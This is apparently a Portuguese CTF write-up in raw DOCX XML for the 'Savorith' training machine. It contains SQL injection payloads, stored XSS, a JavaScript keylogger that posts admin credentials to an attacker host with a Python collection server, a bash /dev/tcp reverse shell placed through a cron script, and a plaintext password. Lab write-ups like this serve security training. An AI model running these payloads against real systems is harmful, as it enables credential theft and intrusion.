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c53smvby5vof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2wiimq4wfpnh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Savorith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O ambiente testado foi baseado em cenários reais encontrados em infraestruturas corporativas.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gmqk94lxhn1t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varredura de portas realizada com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identificou as seguintes portas TCP abertas: 21 (FTP), 22 (SSH) e 80 (HTTP)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65400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="15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porta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21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(FTP)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um serviço ativo. Não foi possível realizar o login, pois não havia credenciais de usuário e senha disponíveis</w:t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74900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="15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porta 80 (HTTP), foi identificado um serviço web ativo exibindo a página inicial chamada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“Savorith”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59100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="15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Realizando fuzzing de diretórios na aplicação web, foram identificados os diretórios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/login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/register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 /admin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http://&lt;ip-machine&gt;/FUZZ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big.txt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572000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="16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Registrando um novo usuário na aplicação.</w:t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21100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="16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Realizando login na aplicação com o usuário recém-criado.</w:t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68700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="16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76600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="16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98800"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="16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a aplicação, foi identificado um botão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“View Product”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ao ser acionado exibe as informações detalhadas do produto.</w:t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89300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="16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URL da aplicação foi identificado um parâmetro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"id"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utilizado para especificar o produto exibido.</w:t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78200"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="17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o parâmetro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"id"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identifica produtos armazenados em banco de dados, foi realizado teste de SQL Injection para verificar falhas no tratamento de entrada de dados. Foi inserido o caractere aspas simples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(')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parâmetro para tentar quebrar a query SQL e validar a vulnerabilidade.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teste confirmou a existência de vulnerabilidade de SQL Injection na aplicação, permitindo a execução de queries SQL no banco de dados. Além disso, foi identificado que a aplicação utiliza MySQL como sistema gerenciador de banco de dados</w:t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03500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="17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iniciar a exploração do SQL Injection, foi necessário identificar o número de colunas retornadas pela query original. Foi utilizado o comando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ORDER BY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incrementando sequencialmente os valores (1, 2, 3...) até que a aplicação retornasse um erro, indicando o número exato de colunas.</w:t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order by 1 -- -  </w:t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retornou erro</w:t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do valor 8, o comando retornou erro, indicando que a aplicação possui 7 colunas no total.</w:t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52700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="17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essa informação, foi utilizado o comando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UNION SELECT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combinar querys SQL e extrair dados do banco de dados.</w:t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realizada a enumeração de todos os bancos de dados existentes no servidor através da consulta ao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information_schema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é um banco de dados padrão do MySQL contendo metadados sobre todos os outros bancos de dados, tabelas, colunas e estruturas do sistema. Foi utilizado o comando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recuperar os registros de forma sequencial</w:t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,schema_name,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information_schema.schemata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</w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2921000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="17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color w:val="ff0000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Alterando o valor do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1,1 foi identificado o banco de dados padrão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performance_schema.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valor 2,1, foi descoberto o banco de dados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 savorith_db</w:t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43300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="17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90900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="17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Os bancos de dados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 information_schema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performance_schema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são padrões do sistema. O banco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savorith_db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criado pelo usuário, portanto foi escolhido para extração de tabelas.</w:t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extrair as tabelas do banco de dados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 savorith_db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realizada uma consulta ao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information_schema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table_schema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filtrar as tabelas do banco específico. A enumeração foi feita incrementando o valor do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union select 1,table_name,3,4,5,6,7 from information_schema.tables where table_schema='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savorith_db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19500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="17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extraídas quatro tabelas do banco de dados: a primeira tabela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admin_logins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(LIMIT 1,1), a segunda tabela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navbar_buttons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(LIMIT 2,1), a terceira tabela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 products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(LIMIT 3,1) e a quarta tabela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(LIMIT 4,1).</w:t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realizada a extração das colunas das tabelas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admin_logins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extrair as colunas, foi realizada uma consulta ao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information_schema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acessando a tabela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columns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filtrando pelo campo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column_name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contém os nomes de todas as colunas das tabelas do banco de dados</w:t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primeira posição (LIMIT 0,1) foi identificada a coluna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union select 1,column_name,3,4,5,6,7 from information_schema.columns where table_schema='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savorith_db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'admin_logins'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05100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="17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primeira posição (LIMIT 0,1) foi identificada a coluna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na segunda (LIMIT 1,1) a coluna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ip,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na terceira (LIMIT 2,1) a coluna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login_time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55900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="17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82900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="18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as colunas identificadas, foi possível extrair os dados diretamente especificando o nome da coluna e da tabela na query SQL.</w:t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,id,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admin_logins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05100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="18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35300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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extrair todas as colunas das tabelas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admin_logins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não foram encontradas informações relevantes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000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Porém, foi identificada a tabela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navbar_buttons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sugere a possibilidade de controle sobre botões inseridos na página.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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realizada a extração das colunas da tabela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navbar_buttons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primeira coluna identificada foi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(LIMIT 0,1).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000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union select 1,column_name,3,4,5,6,7 from information_schema.columns where table_schema='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savorith_db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'navbar_buttons'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84500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="14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posição (LIMIT 0,1) foi identificada a coluna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na posição (LIMIT 1,1) a coluna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na posição (LIMIT 2,1) a coluna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url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na posição (LIMIT 3,1) a coluna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show_auth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2100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="14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54300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="14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86100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="15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utilizada a função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CONCAT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concatenar os dados das colunas e visualizar todas as informações simultaneamente. Ao extrair os dados dessas colunas foram obtidas as seguintes informações.</w:t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,CONCAT(id,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,name,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,url,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,show_auth),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navbar_buttons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60700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="15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Trata-se de um banco de dados que armazena as informações dos botões da barra de navegação, incluindo nome e URL de cada botão.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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testar a funcionalidade, foi realizada a inserção de um botão no banco de dados.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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'; insert into navbar_buttons(id, url, name, show_auth) values(5, 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/admin/teste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'teste'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Embora a injeção SQL tenha retornado um erro, ao acessar a página inicial da aplicação foi confirmado que o botão foi criado com sucesso na interface web.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000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63800"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="15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98800"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="15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Explorando o SQL injection foi possível inserir uma query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 INSERT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banco que adicionou um botão no front-end; esse botão permitiu a injeção de código JavaScript, resultando em um XSS.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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&lt;img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src=x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onerror=alert(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'; insert into navbar_buttons(id, url, name, show_auth) values(8, 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/teste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'&lt;img src=x onerror=alert(1)&gt;'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00300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="15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2100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="15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essa vulnerabilidade, foi possível realizar um UPDATE no banco de dados para modificar o botão de login legítimo. O botão foi alterado para executar um código JavaScript malicioso contendo um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keylogger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objetivo de capturar as credenciais de autenticação do administrador.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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criada uma tag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&lt;script&gt;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referencia um arquivo JavaScript externo (file.js) hospedado em servidor controlado pelo atacante. O script intercepta os dados inseridos nos campos do formulário de login e os transmite para o servidor do atacante</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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&lt;script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src=//&lt;your-ip&gt;/file.js&lt;/script&gt;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navbar_buttons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&gt;&lt;script src=//&lt;your-ip&gt;/file.js&gt;&lt;/script&gt;'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IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="c5221f"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1--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2100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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setInterval(()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document.querySelector(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'input[name="username"]'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document.querySelector(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'input[name="password"]'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user.value.length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pass.value.length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'http://&lt;your ip&gt;:8000/'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'no-cors'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`u=${encodeURIComponent(user.value)}&amp;p=${encodeURIComponent(pass.value)}`,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'application/x-www-form-urlencoded'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clearInterval(interval);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229100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="13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carregar a rota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 /login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script file.js é chamado automaticamente pelo usuário admin da aplicação</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C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98900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="13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file.js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acessado múltiplas vezes no servidor do atacante. Este script redireciona as credenciais capturadas para um segundo servidor externo executando um script Python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(server.py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 responsável por coletar os dados</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C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BaseHTTPRequestHandler,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Handler(BaseHTTPRequestHandler):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do_POST(self):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int(self.headers.get(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'Content-Length'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self.rfile.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(length).decode()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"Received:"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self.send_response(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self.end_headers()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HTTPServer((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"0.0.0.0"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Handler)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"Listening on port 8000..."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server.serve_forever()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Através desse método, foram capturadas as credenciais do usuário administrador</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E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819775" cy="3209925"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="13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2099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realizado o login na aplicação utilizando as credenciais obtidas.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E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635500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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painel de administração apresentou apenas uma página estática sem funcionalidades .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E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89300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="14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as mesmas credenciais, foi obtido acesso ao serviço FTP (File Transfer Protocol) do servidor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E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843588" cy="3457575"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="14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34575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servidor FTP foi identificado o diretório savorith, contendo todos os arquivos da aplicação web.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E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432300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="14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realizado o download de todos os arquivos presentes no diretório. Com a ferramenta wget.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F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ftp://admin:Qm3hvAzpM6OJ7@&lt;ip-machine&gt;/savorith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06700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="14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acesso a todos os arquivos da aplicação web, foi identificado o diretório oculto .git, que contém o histórico completo do versionamento da aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F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84600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="14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isto, podemos ler todos os logs da aplicação web. Com o comando.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000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59200"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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o histórico de commits do repositório Git, foram encontradas credenciais de acesso SSH.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010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43300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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left"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex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d3yb9r417k3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6walx9mv7j96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24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.kcif2tqtjvhh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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Utilizando as credenciais obtidas, foi estabelecido acesso SSH ao servidor com o usuário webadmin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webadmin@&lt;ip-your-machine&gt;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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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acesso ao sistema, foi executada a ferramenta </w:t>
      </w:r>
      <w:hyperlink r:id="rId53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pspy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monitorar os processos em execução na máquina.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000114">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto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host atacante iniciamos um servidor Python para servir o binário pspy e, em seguida, baixamos o arquivo na máquina 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&lt;your-ip&gt;/pspy64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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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executar o binário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pspy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sistema alvo.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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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identificada uma tarefa crontab sendo executada com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UID 1002</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, que executa o script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/opt/healthcheck.sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> periodicamente.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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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Foi identificado que o </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">UID 1002</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> pertence ao usuário </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000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/etc/passwd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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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analisar o conteúdo do arquivo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healthcheck.sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, foi identificado que ele referência dois arquivos no diretório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/tmp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health.log</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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check.conf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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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lineRule="auto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diretório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/tmp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apresenta apenas o arquivo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health.log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não contém o arquivo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check.conf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healthcheck.sh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executado pelo usuário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; portanto, a falta do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check.conf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cria uma janela onde arquivos de configuração arbitrários colocados em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/tmp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seriam consumidos pelo script e executados com privilégios de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 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,permitindo a execução de comandos com privilégios elevados.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5776913" cy="3221740"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="16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322174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Foi criado o arquivo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check.conf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no diretório /tmp para ser executado pelo script.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#!/bin/bahs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013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 -i &gt;&amp; /dev/tcp/&lt;your-ip&gt;/8081 0&gt;&amp;1"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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="16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Foi iniciado o netcat na porta 8081 aguardando a conexão reversa.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Estabelecida uma shell reversa no sistema com o usuário admin.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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="16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IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:i w:val="1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36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1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rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="ff0000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acesso ao usuário admin, foi verificado quais permissões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ele possui através do comando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utilizando as mesmas credenciais obtidas anteriormente da aplicação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web e FTP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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senha:Qm3hvAzpM6OJ7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03500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="16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usuário admin possui permissão para executar qualquer comando como root. Com esse privilégio, foi possível obter uma shell root através do comando sudo bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014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55800"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="17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headerReference r:id="rId65" w:type="default"/>
      <w:headerReference r:id="rId66" w:type="first"/>
      <w:headerReference r:id="rId67" w:type="even"/>
      <w:footerReference r:id="rId68" w:type="default"/>
      <w:footerReference r:id="rId69" w:type="first"/>
      <w:footerReference r:id="rId70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B">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.k8gva5z4x926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45" name="image14.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image14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C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D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9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53" name="image23.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image23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12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Savorith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124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9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image" Target="media/image2.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image56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48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26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hackingclub.com/training/training-machines/274#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16.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.png"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image39.png"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image38.png"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image49.png"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image44.png"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image40.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image58.png"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image50.png"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image53.png"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image51.png"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image45.png"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image54.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image57.png"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image55.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image52.png"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image43.png"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/DominicBreuker/pspy" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image41.png"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.png"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.png"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.png"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image47.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image46.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image42.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4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jpg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2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Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5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Mq/nq8PMkM2cwutiIbEm3Wti1A==">CgMxLjAyDmguYzUzc212Ynk1dm9mMg5oLjJ3aWltcTR3ZnBuaDIOaC5nbXFrOTRseGhuMXQyDmguZDN5YjlyNDE3azNjMg5oLjZ3YWx4OW12N2o5NjIOaC5rY2lmMnRxdGp2aGgyDmguazhndmE1ejR4OTI2OAByITFMUDVWOXJET2ZmcnIzM1Y0TUFCYnZXZTA4dHRkbDdCLQ==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